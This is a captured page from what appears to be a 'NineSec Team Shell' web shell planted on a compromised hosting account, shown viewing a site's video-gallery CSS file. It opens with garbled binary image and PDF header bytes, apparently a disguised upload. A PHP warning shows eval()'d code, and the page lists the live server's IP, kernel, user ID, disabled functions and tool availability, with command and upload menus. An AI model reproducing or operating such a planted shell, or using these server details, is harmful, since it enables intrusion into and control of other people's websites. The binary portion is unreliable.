JFIF``;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 90 C  %PDF-1.3 % 1 0 obj<> endobj 2 0 obj<> endobj 3 0 obj<> endobj 7 1 obj<>/ProcSet[/PDF/Text/ImageB/ImageC/ImageI]>>/Subtype/Form>> stream x\mo7 a?Hyi{$E(i?ckrAvEzFHI|H?{|Z|X|Ň77?Oݞ__lOя77wx'?Ű8I] gQB2za]l|ɇ՟?} " L* & J * j .  N (8HXhx )9IYiy *:JZjz +;K[k{ , C> r. ^ ~ N @ qO!  ` ( S A  a=  ! wQ It Ba @l q T  f !U* A 9%n o M - 5J  w@O|l:Bg y= B=jq K - jM 4EP N q f ^ u> $k ( H l EW o W  %l d] 6 ] - L  > 9 t* y 4 b 5 Q\ \ v U  2c 3  c qM = |  IT: S |{; ^| e]/ n3g _ > t! y {  Zm \{o]'S ~ VN a w - u x* " 3 }$jH q w bx B" < 5b }% + 09_h>G u7$ y MJ$ Y&X z (r ` [N _pny!lu o x `N d z Oy O.* r  _s iQ  BRx .) _6jV ] # W RVy k~ cI Y H  dsR  rZ+ )f d v* ' i G j * cB zi  _  j z[ 7; 2 -  zZ  f V z9 JR n  72 81 [e n &ci ( r  U q _+q rV 3  " > ;1 0x >{ |` r h W q f 3 l ]u b-5 Fwm z zp)M ) jO q u q  E K l 7  [[ y Xg e ~ , 9  k; +ny  )s=9) u_l " Z ; x =. M= +? ^  q $ .[ i [ Fj y Ux { >_ xH  > ; 8 < w/l hy  9o <: 'f4 |   w e  G G * !# b` B,  $*q Ll   (Jq T r ,jq \   0 q d,  4 q ll   8 q t  < q |   @ r , ! D*r l # HJr %/ Ljr '? P r , ) Q; gzuncompress
Warning: file_get_contents(test.txt): Failed to open stream: No such file or directory in /home/u178500310/domains/princess.uaeclick.com/public_html/uploads/1770357389_0_197006009.php(44) : eval()'d code on line 6
NineSec Team Shell
NineSec Team Shell
Server IP : 82.25.113.252  /  Your IP : 216.73.216.172
Web Server : LiteSpeed
System : Linux fr-int-web2058.main-hosting.eu 5.14.0-570.62.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Nov 11 10:10:59 EST 2025 x86_64
User : u178500310 ( 178500310)
PHP Version : 8.2.29
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF
Directory (0755) :  /home/u178500310/domains/pinkrosesentertainment.com/public_html/

[  Home  ][  C0mmand  ][  Upload File  ][  Lock Shell  ][  Logout  ]

Current File : /home/u178500310/domains/pinkrosesentertainment.com/public_html/vidoe.css
 /* Strictly scoped styles for video gallery */
        #video-page {
            --primary-color: #4361ee;
            --primary-dark: #3a0ca3;
            --secondary-color: #f72585;
            --accent-color: #4cc9f0;
            --text-color: #2b2d42;
            --text-color-light: #8d99ae;
            --card-bg: #ffffff;
            --modal-bg: rgba(15, 23, 42, 0.95);
            --transition: 0.4s cubic-bezier(0.25, 0.8, 0.25, 1);
            --border-radius: 16px;
            --gap: 24px;
            --shadow: 0 4px 20px rgba(0, 0, 0, 0.08);
            --shadow-hover: 0 8px 30px rgba(0, 0, 0, 0.12);
            --play-button-size: 72px;
            
            max-width: 1400px;
            margin: 0 auto;
            padding: 60px 20px;
            box-sizing: border-box;
        }

        /* More specific reset to avoid affecting nested elements */
        #video-page .video-grid,
        #video-page .video-card,
        #video-page .video-modal,
        #video-page .modal-content {
            box-sizing: border-box;
            margin: 0;
            padding: 0;
        }

        /* Gradient Background Effect - scoped to video page only */
        #video-page::before {
            content: '';
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: radial-gradient(circle at 10% 20%, rgba(67, 97, 238, 0.1) 0%, rgba(244, 114, 182, 0.1) 90%);
            z-index: -1;
            pointer-events: none;
        }

        /* Video Grid - scoped styles */
        #video-page .video-grid {
            display: grid;
            grid-template-columns: repeat(auto-fill, minmax(360px, 1fr));
            gap: var(--gap);
            font-family: 'Poppins', sans-serif;
            color: var(--text-color);
        }

        #video-page .video-card {
            position: relative;
            border-radius: var(--border-radius);
            overflow: hidden;
            box-shadow: var(--shadow);
            background: var(--card-bg);
            transition: var(--transition);
            aspect-ratio: 16/9;
            transform-style: preserve-3d;
            perspective: 1000px;
        }

        #video-page .video-card::before {
            content: '';
            position: absolute;
            inset: 0;
            background: linear-gradient(45deg, var(--primary-color), var(--secondary-color));
            opacity: 0;
            transition: var(--transition);
            z-index: 1;
        }

        #video-page .video-card:hover {
            transform: translateY(-8px) scale(1.02);
            box-shadow: var(--shadow-hover);
        }

        #video-page .video-card:hover::before {
            opacity: 0.2;
        }

        #video-page .video-card img {
            width: 100%;
            height: 100%;
            object-fit: cover;
            display: block;
            transition: var(--transition);
        }

        #video-page .video-card:hover img {
            transform: scale(1.05);
        }

        /* VIDEO TITLE */
        #video-page .video-title {
            position: absolute;
            bottom: 0;
            left: 0;
            right: 0;
            padding: 20px;
            background: linear-gradient(to top, rgba(0, 0, 0, 0.8), transparent);
            color: white;
            font-weight: 600;
            font-size: 1.1rem;
            z-index: 2;
        }

        /* PLAY BUTTON */
        #video-page .play-button {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            width: var(--play-button-size);
            height: var(--play-button-size);
            background: rgba(255, 255, 255, 0.25);
            backdrop-filter: blur(12px);
            -webkit-backdrop-filter: blur(12px);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            cursor: pointer;
            transition: var(--transition);
            border: 2px solid rgba(255, 255, 255, 0.4);
            box-shadow: 0 0 30px rgba(255, 255, 255, 0.3);
            z-index: 2;
        }

        #video-page .play-button::after {
            content: '';
            width: 0;
            height: 0;
            border-top: 14px solid transparent;
            border-bottom: 14px solid transparent;
            border-left: 24px solid white;
            margin-left: 6px;
            transition: var(--transition);
        }

        #video-page .play-button:hover {
            transform: translate(-50%, -50%) scale(1.15);
            background: rgba(255, 255, 255, 0.35);
            box-shadow: 0 0 40px rgba(255, 255, 255, 0.6);
        }

        #video-page .play-button:hover::after {
            border-left-color: var(--accent-color);
        }

        /* Video Duration Badge */
        #video-page .video-duration {
            position: absolute;
            top: 16px;
            right: 16px;
            background: rgba(0, 0, 0, 0.7);
            color: white;
            padding: 4px 8px;
            border-radius: 4px;
            font-size: 0.8rem;
            font-weight: 500;
            z-index: 2;
        }

        /* Video Modal - scoped with high specificity */
        #video-page .video-modal {
            position: fixed;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            background: var(--modal-bg);
            display: flex;
            align-items: center;
            justify-content: center;
            z-index: 1000;
            opacity: 0;
            visibility: hidden;
            transition: var(--transition);
            backdrop-filter: blur(10px);
        }

        #video-page .video-modal.active {
            opacity: 1;
            visibility: visible;
        }

        #video-page .modal-content {
            position: relative;
            width: 90%;
            max-width: 1100px;
            aspect-ratio: 16/9;
            transform: scale(0.95);
            transition: var(--transition);
        }

        #video-page .video-modal.active .modal-content {
            transform: scale(1);
        }

        #video-page .modal-iframe {
            width: 100%;
            height: 100%;
            border: none;
            border-radius: var(--border-radius);
            box-shadow: 0 20px 50px rgba(0, 0, 0, 0.3);
        }

        #video-page .close-button {
            position: absolute;
            top: -50px;
            right: 0;
            width: 40px;
            height: 40px;
            background: rgba(255, 255, 255, 0.1);
            backdrop-filter: blur(5px);
            border: none;
            color: white;
            font-size: 1.5rem;
            cursor: pointer;
            transition: var(--transition);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
        }

        #video-page .close-button:hover {
            transform: rotate(90deg);
            background: var(--secondary-color);
            color: white;
        }

        /* Navigation Arrows */
        #video-page .nav-arrow {
            position: absolute;
            top: 50%;
            transform: translateY(-50%);
            width: 60px;
            height: 60px;
            background: rgba(255, 255, 255, 0.15);
            backdrop-filter: blur(10px);
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            cursor: pointer;
            border: none;
            color: white;
            font-size: 1.8rem;
            transition: var(--transition);
            z-index: 10;
            opacity: 0.8;
        }

        #video-page .nav-arrow:hover {
            background: var(--primary-color);
            opacity: 1;
            transform: translateY(-50%) scale(1.1);
        }

        #video-page .nav-arrow.prev {
            left: 30px;
        }

        #video-page .nav-arrow.next {
            right: 30px;
        }

        /* Video Info in Modal */
        #video-page .video-info {
            position: absolute;
            bottom: -60px;
            left: 0;
            width: 100%;
            color: white;
            text-align: center;
            opacity: 0;
            transition: var(--transition);
        }

        #video-page .video-modal.active .video-info {
            opacity: 1;
            bottom: -80px;
        }

        #video-page .video-info h3 {
            font-size: 1.5rem;
            margin-bottom: 8px;
            font-weight: 600;
            font-family: 'Poppins', sans-serif;
        }

        #video-page .video-info p {
            color: rgba(255, 255, 255, 0.8);
            font-size: 1rem;
            font-family: 'Poppins', sans-serif;
        }

        /* Social Share */
        #video-page .social-share {
            display: flex;
            justify-content: center;
            gap: 15px;
            margin-top: 20px;
        }

        #video-page .social-share a {
            color: white;
            background: rgba(255, 255, 255, 0.1);
            width: 40px;
            height: 40px;
            border-radius: 50%;
            display: flex;
            align-items: center;
            justify-content: center;
            transition: var(--transition);
        }

        #video-page .social-share a:hover {
            transform: translateY(-3px);
            background: var(--primary-color);
        }

        /* Responsive Breakpoints */
        @media (max-width: 1200px) {
            #video-page .video-grid {
                grid-template-columns: repeat(auto-fill, minmax(300px, 1fr));
            }
        }

        @media (max-width: 768px) {
            #video-page {
                padding: 40px 15px;
            }
            
            #video-page .play-button {
                --play-button-size: 56px;
            }
            
            #video-page .nav-arrow {
                width: 50px;
                height: 50px;
                font-size: 1.5rem;
            }
        }

        @media (max-width: 576px) {
            #video-page .video-grid {
                grid-template-columns: 1fr;
            }
            
            #video-page .modal-content {
                width: 95%;
            }
            
            #video-page .close-button {
                top: -70px;
                right: 50%;
                transform: translateX(50%);
            }
            
            #video-page .nav-arrow {
                width: 40px;
                height: 40px;
                font-size: 1.2rem;
            }
        }

        /* Animations */
        @keyframes fadeIn {
            to {
                opacity: 1;
                transform: translateY(0);
            }
        }

        /* Delay grid items for staggered animation */
        #video-page .video-card {
            opacity: 0;
            transform: translateY(30px);
            animation: fadeIn 0.6s var(--transition) forwards;
        }

        #video-page .video-card:nth-child(1) { animation-delay: 0.1s; }
        #video-page .video-card:nth-child(2) { animation-delay: 0.2s; }
        #video-page .video-card:nth-child(3) { animation-delay: 0.3s; }
        #video-page .video-card:nth-child(4) { animation-delay: 0.4s; }
        #video-page .video-card:nth-child(5) { animation-delay: 0.5s; }
        #video-page .video-card:nth-child(6) { animation-delay: 0.6s; }

NineSec Team - 2022